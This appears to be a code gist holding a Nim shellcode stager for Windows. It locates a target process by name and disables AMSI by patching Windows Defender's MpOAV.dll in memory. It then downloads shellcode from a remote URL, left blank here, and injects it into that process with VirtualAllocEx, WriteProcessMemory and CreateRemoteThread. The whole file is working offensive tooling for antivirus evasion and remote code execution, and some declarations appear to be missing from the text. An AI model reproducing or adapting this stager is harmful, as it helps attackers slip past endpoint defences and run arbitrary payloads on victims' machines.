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Created October 24, 2023 10:43
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Shellcode stager that loads remote shellcode directly into memory of specified process.
import winim
import os
import httpclient, streams
import sequtils, strutils, strformat
# Status indicators
template success(s: varargs[untyped]): untyped =
when DEBUG:
echo "[+] ", s
template fail(s: varargs[untyped]): untyped =
when DEBUG:
echo "[-] ", s
template info(s: varargs[untyped]): untyped =
when DEBUG:
echo "[*] ", s
template debug(s: varargs[untyped]): untyped =
when DEBUG:
echo "[>] ", s
const DEBUG = true
const url = ""
const target = "flameshot.exe"
proc GetPIDByName(process: string) : DWORD =
var pid: DWORD
# Create snapshot
var snapshot : HANDLE = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
var process: PROCESSENTRY32W
ZeroMemory(&process, sizeof(PROCESSENTRY32W))
process.dwSize = cast[DWORD](sizeof(process))
# Iterate over processes
while Process32NextW(snapshot, &process) != 0:
var processName: string = ""
for c in process.szExeFile:
if c == 0:
if processName == target:
debug("Found process: ", process.szExeFile, ", PID: ", process.th32ProcessID)
pid = process.th32ProcessID
# Close snapshot handle
return pid
when defined amd64:
info("Running in x64 process")
const patch: array[6, byte] = [byte 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3]
elif defined i386:
info("Running in x86 process")
const patch: array[8, byte] = [byte 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00]
proc patchAMSI() : bool =
cs: pointer
disabled: bool = false
let filesInPath = toSeq(walkDir("C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\", relative=true))
var length = len(filesInPath)
amsi = LoadLibrary(fmt"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\{filesInPath[length-1].path}\\MpOAV.dll")
if amsi == 0:
fail("Failed to load MpOav.dll")
return disabled
cs = GetProcAddress(amsi,"DllGetClassObject")
if cs == nil:
fail("Failed to get the address of 'DllGetClassObject'")
return disabled
if VirtualProtect(cs, patch.len, 0x40, addr op):
info("Applying patch")
copyMem(cs, unsafeAddr patch, patch.len)
VirtualProtect(cs, patch.len, op, addr t)
disabled = true
return disabled
proc run() : int =
var pHandle: HANDLE
# Get PID of target process
info(fmt"Getting PID of {target}")
var pid = GetPIDByName(target)
if pid == 0:
fail(fmt"Failed to get PID of {target}. Check if the process is running.")
info(fmt"Using current process instead.")
# GetCurrentProcess:
info("Getting handle to current process")
pHandle = GetCurrentProcess()
if pHandle == 0:
fail("Failed to get handle to current process: ", GetLastError())
return ERROR
success(fmt"> Got handle to current process: {pHandle}")
success(fmt"> Got PID to process {target}: {pid}")
# OpenProcess:
info(fmt"Getting handle to process {target}")
pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, pid)
if pHandle == 0:
fail(fmt"Failed to get handle to process {target}: ", GetLastError())
return ERROR
success(fmt"> Got handle to process {target}: {pHandle}")
# Fetch shellcode from remote web server
info(fmt"Fetching payload from {url}")
var response = newHttpClient().get(url)
if response.status != "200 OK":
fail(fmt"Failed to fetch payload from {url}: {response.status}")
return ERROR
var shellcode = response.bodyStream.readAll()
success(fmt"> Read {shellcode.len} bytes from {url}")
# Patch AMSI
info("Patching AMSI")
if patchAMSI() == false:
fail("Failed to patch AMSI")
return ERROR
success("> Patched AMSI")
# VirtualAllocEx:
info("Allocating memory in process")
var lpAddress = VirtualAllocEx(pHandle, nil, shellcode.len, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if lpAddress == nil:
fail("Failed to allocate memory: ", GetLastError())
return ERROR
success(fmt"> Allocated {shellcode.len} bytes at base address {cast[ByteAddress](lpAddress)}")
# WriteProcessMemory:
info("Writing shellcode to process memory")
var bytesWritten: SIZE_T = 0
if WriteProcessMemory(pHandle, lpAddress, &shellcode, shellcode.len, &bytesWritten) == 0:
fail("Failed to write process memory: ", GetLastError())
return ERROR
success(fmt"> Wrote {bytesWritten} bytes.")
# CreateRemoteThread:
info("Creating remote thread")
var threadId: DWORD = 0
var hThread = CreateRemoteThread(pHandle, nil, 0, cast[LPTHREAD_START_ROUTINE](lpAddress), nil, 0, &threadId)
if hThread == 0:
fail("Failed to create remote thread: ", GetLastError())
return ERROR
success(fmt"> Thread ID: {threadId}")
success(fmt"> Thread handle: {hThread}")
# WaitForSingleObject:
info(fmt"Waiting for thread {hThread} to exit.")
WaitForSingleObject(hThread, INFINITE)
success("> Thread exited.")
# CloseHandle:
info("Closing process handle")
info("Closing thread handle")
return SUCCESS
when isMainModule:
discard run()
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